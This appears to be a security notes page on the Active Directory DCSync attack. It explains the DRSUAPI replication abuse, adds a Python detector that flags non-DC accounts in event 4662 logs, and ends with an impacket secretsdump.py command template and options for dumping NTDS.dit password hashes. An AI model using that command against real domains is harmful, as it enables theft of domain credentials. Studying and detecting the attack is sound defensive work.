DCSync

DCSync is an attack in which an attacker impersonates a Domain Controller and asks a legitimate Domain Controller to replicate directory data to it, obtaining sensitive information such as the password hashes stored in NTDS.dit without ever touching the file itself.

An account on the target domain with Replicate Directory Changes rights on the domain naming context is required in order to attempt a DCSync attack.

By default, domain administrators, enterprise administrators, and domain controllers have Replicate Directory Changes rights. However, I've run into cases where non-privileged accounts are accidentally given these rights.

This attack relies on the Microsoft Directory Replication Service RPC interface (DRSUAPI), which implements the Directory Replication Service Remote (MS-DRSR) protocol used to replicate directory data between Domain Controllers.

The attacker calls the DRSGetNCChanges function in DRSUAPI to request AD objects from a legitimate Domain Controller, and the Domain Controller responds with a replication structure containing the requested attributes, including usernames and password hashes.
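Because a DCSync request is, on the wire, an ordinary replication request, the defensive check is not on the protocol but on who is asking. With "Audit Directory Service Access" enabled and the domain object's SACL auditing control access, every replication request is logged as Security event 4662 whose Properties field lists the extended-right GUIDs exercised (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, the two rights the page calls Replicate Directory Changes). The detector below is an added example, not code from the original page: it runs over constructed 4662 records and flags any replication request whose subject is not a known Domain Controller computer account. The record field names follow the 4662 event schema; the DC list, account names and timestamps are constructed for the demo.

```python
"""
Flag DCSync-style replication requests in Windows Security event 4662 records.

Added example for this page, not part of the original text. Field names follow
the 4662 event schema (SubjectUserName, SubjectDomainName, AccessMask,
Properties, ObjectName); the sample records and the DC list are constructed.
"""
import re

# Well-known schema GUIDs of the replication extended rights (not page-specific values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # AccessMask bit meaning "control access" (an extended right)

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def replication_rights_in(properties: str) -> list:
    """Return the names of replication extended rights referenced in a Properties field."""
    found = []
    for guid in GUID_RE.findall(properties):
        name = REPLICATION_RIGHTS.get(guid.lower())
        if name:
            found.append(name)
    return found


def detect_dcsync(events, domain_controllers):
    """
    Return one finding per 4662 event that exercises a replication right
    from an account that is not a known Domain Controller computer account.
    `domain_controllers` holds DC computer account names such as {"DC01$"}.
    """
    dc_accounts = {name.upper() for name in domain_controllers}
    findings = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        # Extended rights are only exercised when the control-access bit is set.
        if int(ev.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS == 0:
            continue
        rights = replication_rights_in(ev.get("Properties", ""))
        if not rights:
            continue
        subject = ev["SubjectUserName"]
        if subject.upper() in dc_accounts:
            continue  # normal DC-to-DC replication; not interesting
        findings.append({
            "account": f"{ev.get('SubjectDomainName', '')}\\{subject}",
            "rights": rights,
            "object": ev.get("ObjectName", ""),
            "time": ev.get("TimeCreated", ""),
        })
    return findings


# Constructed sample records (hypothetical domain CORP, DCs DC01/DC02, user svc_backup).
KNOWN_DCS = {"DC01$", "DC02$"}
SAMPLE_EVENTS = [
    {   # routine replication by a real DC: must not be flagged
        "EventID": 4662, "TimeCreated": "2024-01-01T03:00:00Z",
        "SubjectDomainName": "CORP", "SubjectUserName": "DC02$",
        "AccessMask": "0x100", "ObjectName": "DC=corp,DC=example",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # a service account exercising both replication rights: flag it
        "EventID": 4662, "TimeCreated": "2024-01-01T03:05:00Z",
        "SubjectDomainName": "CORP", "SubjectUserName": "svc_backup",
        "AccessMask": "0x100", "ObjectName": "DC=corp,DC=example",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # same account, control access on an unrelated (constructed) right: ignore
        "EventID": 4662, "TimeCreated": "2024-01-01T03:06:00Z",
        "SubjectDomainName": "CORP", "SubjectUserName": "svc_backup",
        "AccessMask": "0x100", "ObjectName": "CN=someuser,DC=corp,DC=example",
        "Properties": "{deadbeef-0000-4000-8000-000000000001}",
    },
]

if __name__ == "__main__":
    for f in detect_dcsync(SAMPLE_EVENTS, KNOWN_DCS):
        print(f"{f['time']} {f['account']} requested {', '.join(f['rights'])} on {f['object']}")
```

Two caveats when running this against real logs: 4662 is only emitted if the SACL on the domain object audits control access for the relevant principals, so confirm the audit policy before trusting an empty result; and the DC list must be maintained from the actual Domain Controllers OU, since a stale list turns every new DC into a false positive and a missing entry hides nothing. The logic generalises to any 4662 feed with these fields, not only the constructed records shown.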

Exploit

Linux (impacket)
secretsdump.py [domain/]username[:password]@<DC hostname or IP> <options>

OPTIONS
-just-dc                    Extract Only NTDS.dit Data (NTLM/Kerberos Keys)
-just-dc-ntlm               Extract Only NTDS.dit Data (NTLM Only)
-just-dc-user [username]    Extract Only NTDS.dit Data For Specified User
-user-status                Display If The User Is Disabled
-history                    Dump Password History
-outputfile                 Base Output Filename

-hashes                     Authenticate Using LMHASH:NTHASH
-k                          Use Kerberos Auth From ccache File
